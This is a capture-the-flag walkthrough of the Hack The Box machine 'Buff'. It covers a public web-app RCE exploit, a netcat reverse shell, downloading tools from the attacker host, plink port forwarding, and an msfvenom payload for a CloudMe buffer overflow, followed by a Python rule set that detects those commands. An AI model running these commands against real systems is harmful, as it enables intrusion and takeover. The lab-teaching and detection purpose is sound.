
Buff is a Windows machine from Hack The Box rated easy. It consists of exploiting Gym Management Software 1.0 to obtain initial access and then, after setting up port forwarding, exploiting a buffer overflow in a binary running on the machine.
Enumeration
Running nmap:
nmap -sC -sV 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.079s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Browsing to port 8080 we find the following page:
Going to the contact page, we see the site was built with Gym Management Software 1.0.
Exploitation
The following RCE exploit was found for Gym Management Software 1.0:
https://www.exploit-db.com/exploits/48506
Running the exploit we get a limited web shell:
python exploit.py 'http://10.10.10.198:8080/'
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
To obtain a complete shell, we can upload netcat to the machine.
First we set up a Python HTTP server on our machine:
python -m SimpleHTTPServer 80
Now we download netcat onto the victim machine from the web shell:
C:\xampp\htdocs\gym\upload> powershell -c Invoke-WebRequest http://10.10.14.50/nc.exe -OutFile nc.exe
Using netcat to set up a reverse shell back to our listener:
C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.14.50 443
And we obtain a complete shell as user shaun:
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.198] 49698
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
Privilege Escalation
Enumerating the machine, I found CloudMe 1.11.2 inside the Downloads folder:
Directory of C:\Users\shaun\Downloads
14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
Then, running tasklist, we see that CloudMe.exe is running:
C:\Users\shaun\Downloads>tasklist
CloudMe.exe                   2820                            0     36,396 K
Searching for that binary, I found a buffer overflow exploit for it:
https://www.exploit-db.com/exploits/48389
As the Windows machine didn't have Python, we need to use port forwarding to run the exploit from our own machine; reading the exploit code we see the service listens on port 8888, bound to localhost on Buff.
For this purpose we will be using plink: its -R option makes port 8888 on our machine forward, through the SSH session, to 127.0.0.1:8888 on Buff, so the exploit can simply target localhost.
C:\Users\shaun\Desktop>powershell -c Invoke-WebRequest http://10.10.14.50/plink.exe -OutFile plink.exe
C:\Users\shaun\Desktop>plink.exe -l root -pw hola123 -R 8888:127.0.0.1:8888 10.10.14.50
Now we generate new shellcode for the exploit with msfvenom, pointing it at our listener:
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.50 LPORT=4444 -b '\x00\x0A\x0D' -f python EXITFUNC=thread -v payload
Running the exploit gives us a reverse shell as administrator:
python cloudme.py
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.198] 49719
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
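From the defensive side, the whole chain above (web server spawning a shell, the Invoke-WebRequest download of nc.exe, nc.exe -e, and the plink -R forward) leaves distinctive process-creation events. The following Python is an added example, not code from the writeup: a small rule set run over constructed events modelled on Sysmon Event ID 1 fields; the events, rule names and helper functions are my own assumptions.

```python
# Added example: flag the process-creation pattern seen on Buff. Events are constructed
# to mirror the commands in the writeup; field names follow Sysmon Event ID 1.
import re
from typing import Dict, List

EVENTS: List[Dict[str, str]] = [  # constructed sample telemetry, not captured data
    {"ParentImage": r"C:\xampp\apache\bin\httpd.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "User": r"BUFF\shaun"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Invoke-WebRequest http://10.10.14.50/nc.exe -OutFile nc.exe", "User": r"BUFF\shaun"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\xampp\htdocs\gym\upload\nc.exe",
     "CommandLine": "nc.exe -e cmd.exe 10.10.14.50 443", "User": r"BUFF\shaun"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Users\shaun\Desktop\plink.exe",
     "CommandLine": "plink.exe -l root -pw hola123 -R 8888:127.0.0.1:8888 10.10.14.50", "User": r"BUFF\shaun"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt", "User": r"BUFF\shaun"},  # benign control
]

SHELLS = ("cmd.exe", "powershell.exe")
WEB_SERVERS = ("httpd.exe", "w3wp.exe", "php-cgi.exe")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule an event matches (empty list if benign)."""
    hits: List[str] = []
    cmd = ev["CommandLine"]
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if parent in WEB_SERVERS and image in SHELLS:          # web shell activity
        hits.append("webserver_spawned_shell")
    if re.search(r"Invoke-WebRequest|iwr\b|DownloadFile", cmd, re.I) and re.search(r"\.exe\b", cmd, re.I):
        hits.append("powershell_download_cradle")          # executable fetched to disk
    if image == "nc.exe" or re.search(r"\bnc(64)?\.exe\b.*\s-e\s", cmd, re.I):
        hits.append("netcat_exec_shell")
    if image == "plink.exe" and re.search(r"\s-R\s+\d+:", cmd):
        hits.append("plink_remote_forward")                # SSH remote port-forward
    if "\\htdocs\\" in ev["Image"].lower() and image.endswith(".exe"):
        hits.append("exe_in_webroot")                      # binary run from upload dir
    return hits

def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Pair each suspicious event's image name with the rules it triggered."""
    return [(basename(e["Image"]), classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for name, rules in scan(EVENTS):
        print(f"{name}: {', '.join(rules)}")
```

Each of the four attacker commands trips at least one rule while the notepad control trips none; on a real host the same fields come from Sysmon or the Security log's 4688 events with command-line auditing enabled.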